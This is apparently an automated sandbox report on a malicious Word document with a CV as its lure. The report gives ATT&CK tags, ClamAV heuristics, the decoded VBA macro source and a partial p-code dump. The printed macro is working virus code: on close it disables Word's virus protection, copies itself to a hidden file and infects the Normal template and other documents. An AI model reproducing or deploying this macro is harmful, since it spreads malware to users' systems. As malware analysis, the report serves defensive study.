Verdict: MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The macros attempt to copy their own source to a file named 'c:\IDEDev.___', suggesting an attempt to establish persistence or to prepare for further execution. The document body is a curriculum vitae, likely a lure to encourage the user to enable macros.
Heuristics (2)
- ClamAV: Doc.Trojan.Ethan-20 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Ethan-20
- VBA macros detected (medium, OLE_VBA_MACROS): document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6792 bytes |

SHA-256: 2b82a196b78c3a987974d465a7fff736eab7ce7d78dd082f524315c45b2a3466
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Rem ID
Private Sub Document_Close()

Rem >>>>>>>>>>Wordbackup
Rem Makes backups of Word Documents Whever You Like It Or You don't

Rem Initialise
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Randomize

Rem >>>>>>>>>>Breed The Code<<<<<<<<<<<<<

Rem Copy Self To c:\IDEDev.___
Open "c:\IDEDev.___" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\IDEDev.___", 6

Rem Does master contain Macro?
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Rem ID" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Rem ID" Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
t = ""
End If

Rem If Not Then Copy The Contents Of c:\IDEDev.___ to it
If t <> "" Then
Open "c:\IDEDev.___" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s

Rem >>>>>>>>>>>>>Backup The Document<<<<<<<<<<<<<<<<
temp = ActiveDocument.FullName
savedir = "c:\winbackup"
savefile = savedir + "\" + ActiveDocument.Name
MkDir (savedir)
SaveAs (savefile)
SaveAs (temp)
End Sub

' Processing file: /opt/analyzer/scan_staging/51cbaae99fcd429f84317119e4ae7d3c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8386 bytes
' Line #0:
' Line #1:
'   Rem 0x0003 " ID"
' Line #2:
'   FuncDefn (Private Sub Document_Close())
' Line #3:
' Line #4:
'   Rem 0x0015 " >>>>>>>>>>Wordbackup"
' Line #5:
'   Rem 0x0040 " Makes backups of Word Documents Whever You Like It Or You don't"
' Line #6:
' Line #7:
'   Rem 0x000B " Initialise"
' Line #8:
'   OnError (Resume Next)
' Line #9:
'   Ld ActiveDocument
'   MemLd Saved
'   St s
' Line #10:
'   LitDI2 0x0001
'   UMi
'   Not
'   Ld Application
'   MemSt EnableCancelKey
' Line #11:
'   StartWithExpr
'   Ld Options
'   With
'   BoS 0x0000
'   LitDI2 0x0000
'   MemStWith ConfirmConversions
'   BoS 0x0000
'   LitDI2 0x0000
'   MemStWith VirusProtection
'   BoS 0x0000
'   LitDI2 0x0000
'   MemStWith SaveNormalPrompt
'   BoS 0x0000
'   EndWith
' Line #12:
'   ArgsCall Read 0x0000
' Line #13:
' Line #14:
'   Rem 0x0026 " >>>>>>>>>>Breed The Code<<<<<<<<<<<<<"
' Line #15:
' Line #16:
'   Rem 0x001B " Copy Self To c:\IDEDev.___"
' Line #17:
'   LitStr 0x000D "c:\IDEDev.___"
'   LitDI2 0x0001
'   Sharp
'   LitDefault
'   Open (For Output)
' Line #18:
'   StartForVariable
'   Ld i
'   EndForVariable
'   LitDI2 0x0001
'   LitDI2 0x0001
'   Ld MacroContainer
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   MemLd CountOfLines
'   For
' Line #19:
'   Ld i
'   LitDI2 0x0001
'   LitDI2 0x0001
'   Ld MacroContainer
'   MemLd VBProject
'   MemLd VBComponents
'   ArgsMemLd Item 0x0001
'   MemLd CodeModule
'   ArgsMemLd Lines 0x0002
'   St a
' Line #20:
'   LitDI2 0x0001
'   Sharp
'   PrintChan
'   Ld a
'   PrintItemNL
' Line #21:
'   StartForVariable
'   Ld i
'   EndForVariable
'   NextVar
' Line #22:
'   LitDI2 0x0001
'   Sharp
'   Close 0x0001
' Line #23:
'   LitStr 0x000D "c:\IDEDev.___"
'   LitDI2 0x0006
'   ArgsCall SetAttr 0x0002
' Line #24:
' Line #25:
'   Rem 0x001B " Does master contain Macro?"
' Line #26:
'   L ... (truncated)
```